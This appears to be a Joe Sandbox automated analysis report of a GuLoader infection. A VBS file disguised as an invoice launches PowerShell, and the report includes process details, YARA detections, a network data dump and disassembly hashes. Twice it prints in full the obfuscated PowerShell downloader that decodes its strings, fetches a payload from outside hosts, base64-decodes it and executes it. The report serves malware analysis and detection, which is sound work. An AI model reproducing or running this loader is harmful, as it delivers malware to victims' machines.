                  2024-08-28 04:54:13 UTC8000INData Raw: 71 78 52 50 39 65 33 44 72 76 67 62 49 75 2b 59 71 78 52 50 39 64 42 59 4d 35 54 61 4f 5a 36 31 65 6c 54 4e 33 33 42 68 6c 6e 75 4b 42 44 41 57 71 78 52 50 39 65 63 70 4c 6f 65 71 74 62 6b 45 4f 71 42 55 63 32 59 30 6a 77 79 63 4f 66 74 56 74 6f 44 34 62 4f 5a 30 68 53 38 35 70 76 4a 56 68 64 76 77 64 33 6c 4e 62 6f 57 59 4e 37 71 31 75 6c 54 68 74 78 66 70 53 5a 53 4f 4e 4c 4f 53 73 6e 75 4e 56 59 59 38 53 35 44 76 74 4c 2b 42 35 46 7a 68 4f 38 69 55 76 52 63 5a 49 59 2b 31 2b 6c 72 2f 72 46 73 6d 66 6a 55 6b 31 67 4d 6a 32 32 38 76 75 51 52 4d 35 30 77 30 59 71 2b 2f 50 68 68 53 4e 46 6f 59 4f 2b 55 2f 33 7a 34 55 70 74 52 50 39 64 53 52 74 33 71 6a 39 62 75 56 6c 77 68 50 64 66 70 38 41 58 62 6c 44 58 49 46 5a 48 31 76 6d 4b 62 55 54 2f 58 64 4d 70 30
                  Data Ascii: qxRP9e3DrvgbIu+YqxRP9dBYM5TaOZ61elTN33BhlnuKBDAWqxRP9ecpLoeqtbkEOqBUc2Y0jwycOftVtoD4bOZ0hS85pvJVhdvwd3lNboWYN7q1ulThtxfpSZSONLOSsnuNVYY8S5DvtL+B5FzhO8iUvRcZIY+1+lr/rFsmfjUk1gMj228vuQRM50w0Yq+/PhhSNFoYO+U/3z4UptRP9dSRt3qj9buVlwhPdfp8AXblDXIFZH1vmKbUT/XdMp0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:00:53:57
                  Start date:28/08/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs"
                  Imagebase:0x7ff623690000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:00:53:59
                  Start date:28/08/2024
                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Imagebase:0x7ff6ef0c0000
                  File size:496'640 bytes
                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:00:54:09
                  Start date:28/08/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3 Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive '.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ') ;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt ') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran vigt Fi e StenU satKons Jeaa$KommCG,psl Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive 'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors ');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma: f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d .vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$ AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:4
                  Start time:00:54:09
                  Start date:28/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:5
                  Start time:00:54:10
                  Start date:28/08/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
                  Imagebase:0x7ff669880000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:00:54:17
                  Start date:28/08/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3 Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive '.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ') ;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt ') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran vigt Fi e StenU satKons Jeaa$KommCG,psl Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive 'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors ');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma: f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d .vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$ AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;"
                  Imagebase:0x390000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.3337285382.0000000008D80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.3337411783.000000000C8EC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.3322827054.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:8
                  Start time:00:54:18
                  Start date:28/08/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FF848D7BE92 Relevance: .5, Instructions: 462COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3445621924.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ff08d41bfff0deb236263f1c0e16f2483bb36de9faa481c3c15e1cfa928c424c
                    • Instruction ID: cffbd415a7e0404d9a3d885f741025ba28c38d1f95b841be2ba373d20f57944f
                    • Opcode Fuzzy Hash: ff08d41bfff0deb236263f1c0e16f2483bb36de9faa481c3c15e1cfa928c424c
                    • Instruction Fuzzy Hash: 64E1A13090DA8D8FEBA8EF28C8557E977E1FF54350F14426AE84DC7295CF78A8448B81
                    Function 00007FF848D7B116 Relevance: .5, Instructions: 457COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3445621924.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3e20735af5e453192bed70026e1a7f86f985a8e079b6fe87ce1b253e426b8524
                    • Instruction ID: 01c731ff24c7ff11f6aa7f1c6e8cd6551d1020cf2625feed936fb52c1cf41f77
                    • Opcode Fuzzy Hash: 3e20735af5e453192bed70026e1a7f86f985a8e079b6fe87ce1b253e426b8524
                    • Instruction Fuzzy Hash: C0E18F3090DA4D8FEBA8EF28C8557F977E1FF58340F54426AE84DC7295CB34A9458B81
                    Function 00007FF848E44919 Relevance: .5, Instructions: 466COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3446880050.00007FF848E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fe7ea0751f61333640d4772b881a717dce695ece013b32aaf959bf30e591deb5
                    • Instruction ID: 7daecb7fe56f0df1e9dea4231081b56b421ea5e6b15ca20933f587941082bb47
                    • Opcode Fuzzy Hash: fe7ea0751f61333640d4772b881a717dce695ece013b32aaf959bf30e591deb5
                    • Instruction Fuzzy Hash: 54E13731E0EA8A5FE799EB2C58556B87BE1FF456A8F0801BAD00DC71D3DF28D8058359
                    Function 00007FF848D7BAA6 Relevance: .3, Instructions: 335COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3445621924.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf54a0e452f1388d8f7b2ecfad42f634273d1f1a9213505a475b3e48e094a6fd
                    • Instruction ID: ceefa0012c17f6e7e05f1fef9e29b99291c93e4cd28a837fd15841e6bb6283e4
                    • Opcode Fuzzy Hash: bf54a0e452f1388d8f7b2ecfad42f634273d1f1a9213505a475b3e48e094a6fd
                    • Instruction Fuzzy Hash: 86B1C33050DA4D4FEB68EF2888557E93BE1FF55350F04826EE84DC7292CF74A9458B86
                    Function 00007FF848E44AB7 Relevance: .2, Instructions: 150COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3446880050.00007FF848E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848e40000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a5dc0f11b87ce70aa5d26babeaa5413ffb11bdff34701fc30b3ee891185032ce
                    • Instruction ID: b9b9809ce1e928a5f93d9155f20b29a91e6718cfd1c60164e8e0f2ccda65a6e5
                    • Opcode Fuzzy Hash: a5dc0f11b87ce70aa5d26babeaa5413ffb11bdff34701fc30b3ee891185032ce
                    • Instruction Fuzzy Hash: CE41F421E1FA8A9FF395EB2C54116746AE1FF45AACF5801B9D01CD71D3DF28AC488319
                    Function 00007FF848D7B5A4 Relevance: .1, Instructions: 91COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.3445621924.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7ff848d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d74c5759a9f7dda2df47b632af7f9d98d28e581241bd37c6aee1b93d0a33626
                    • Instruction ID: f89e739d2f772592f00f8fdd57ee16e99e85c5502f2582f45f2097738ae4543b
                    • Opcode Fuzzy Hash: 7d74c5759a9f7dda2df47b632af7f9d98d28e581241bd37c6aee1b93d0a33626
